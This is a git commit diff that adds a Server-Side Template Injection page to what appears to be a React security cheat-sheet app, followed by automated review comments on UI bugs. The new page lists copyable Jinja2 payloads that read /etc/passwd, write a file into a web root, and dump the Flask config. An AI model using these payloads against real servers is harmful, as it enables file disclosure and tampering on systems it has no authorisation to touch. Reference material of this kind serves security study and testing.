
Commit 1cc4979

committed
adding read and write SSTI
1 parent aaa8c82 commit 1cc4979


2 files changed

+110
-2
lines changed


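--- a/src/components/LayoutApp.js
+++ b/src/components/LayoutApp.js
@@ -16,7 +16,7 @@ import XSS from "./web/XSS";
 import SQLi from "./web/SqlInjection";
 import AboutUs from "./AboutUs";
 import FeedRSS from "./FeedRSS";
-
+import SSTI from "./web/SSTI"
 const { Paragraph } = Typography;
 const { Sider, Content, Footer } = Layout;
 const IconFont = createFromIconfontCN({
@@ -186,12 +186,24 @@ export default (props) => {
 style={{ fontSize: "1.5em", marginTop: 3 }}
 />
 }
-onClick={() => goTo(FeedRSS)}
+onClick={() => goTo(SSTI)}
 >
 Feed RSS
 </Menu.Item>
 <Menu.Item
 key='13'
+icon={
+<IconFont
+type='icon-rss'
+style={{ fontSize: "1.5em", marginTop: 3 }}
+/>
+}
+onClick={() => goTo(FeedRSS)}
+>
+Feed RSS
+</Menu.Item>
+<Menu.Item
+key='14'
 icon={
 <IconFont
 type='icon-about'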
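Review bot: The menu item whose handler now calls `goTo(SSTI)` keeps the visible text `Feed RSS` (new line 191), and the item added under `key='13'` is also labelled `Feed RSS`, so the sidebar ends up with two identical entries and the first one opens the template-injection page. Rename the first entry's text to something like `Template Injection` and, if its icon is also the RSS one (the `icon` prop starts above this hunk, so that is a guess), give it a distinct `type`. The new `import SSTI from "./web/SSTI"` also lacks the trailing semicolon its neighbours have. The component body starts and ends outside the hunk.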

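--- a/src/components/web/SSTI.js
+++ b/src/components/web/SSTI.js
@@ -0,0 +1,96 @@
+import React from "react";
+import { Typography, Divider } from "antd";
+import QueueAnim from "rc-queue-anim";
+const { Title, Paragraph } = Typography;
+
+export default (props) => {
+
+
+
+const python_jinja_dump = [{
+title: `{% for key, value in config.iteritems() %}
+<dt>{{ key|e }}</dt>
+<dd>{{ value|e }}</dd>
+{% endfor %}`
+}]
+;
+
+const python_jinja_read = [
+{ title: `{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}` },
+{
+title: `{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }}`
+},
+];
+const python_jinja_write = [
+{ title: `{{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}` },
+];
+
+const python_jinja_rce = [
+{
+title: ``
+}
+]
+return (
+<QueueAnim delay={300} duration={1500}>
+<Title
+variant='Title level={3}'
+style={{ fontWeight: "bold", margin: 15 }}
+>
+Template Injections (SSTI)
+</Title>
+<Paragraph style={{ margin: 15 }}>
+Template injection allows an attacker to include template code into an existant (or not) template.
+A template engine makes designing HTML pages easier by using static template files which at runtime replaces variables/placeholders with actual values in the HTML pages
+
+
+</Paragraph>
+
+<Divider dashed />
+<Title style={{margin :15}} >
+Jinja2 ( Flask / Django )
+</Title>
+<div
+key='a'
+style={{
+padding: 15,
+}}
+>
+<Title level={3}>File reading</Title>
+<Paragraph>
+
+</Paragraph>
+{python_jinja_read.map((k, i) => {
+return (
+<Paragraph key={i} copyable>
+{k.title}
+</Paragraph>
+);
+})}
+</div>
+<Divider dashed />
+<div
+key='b'
+style={{
+padding: 15,
+}}
+>
+<Title level={3}>Write into a file</Title>
+<Paragraph>
+
+</Paragraph>
+{python_jinja_write.map((k, i) => {
+return (
+<Paragraph key={i} copyable>
+{k.title}
+</Paragraph>
+);
+})}
+</div>
+<Divider dashed />
+
+
+
+
+</QueueAnim>
+);
+};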
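Review bot: The main heading passes `variant='Title level={3}'` (new line 36), which is one string prop, so the intended heading level is never applied; it should read `<Title level={3} style={{ fontWeight: "bold", margin: 15 }}>`. `python_jinja_dump` and `python_jinja_rce` are declared but never rendered, and the latter holds only an empty string, so either render them or drop them until they are needed. The two empty `<Paragraph>` blocks under "File reading" and "Write into a file" are where the page should state the precondition (user input compiled as template source; `iteritems()` ties the dump snippet to Python 2) and the fix a defender applies: pass user data as render-context variables instead of concatenating it into the template string. The intro text also has the typo `existant`, and the heading `Jinja2 ( Flask / Django )` may mislead, since Django uses its own template language unless Jinja2 is configured.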
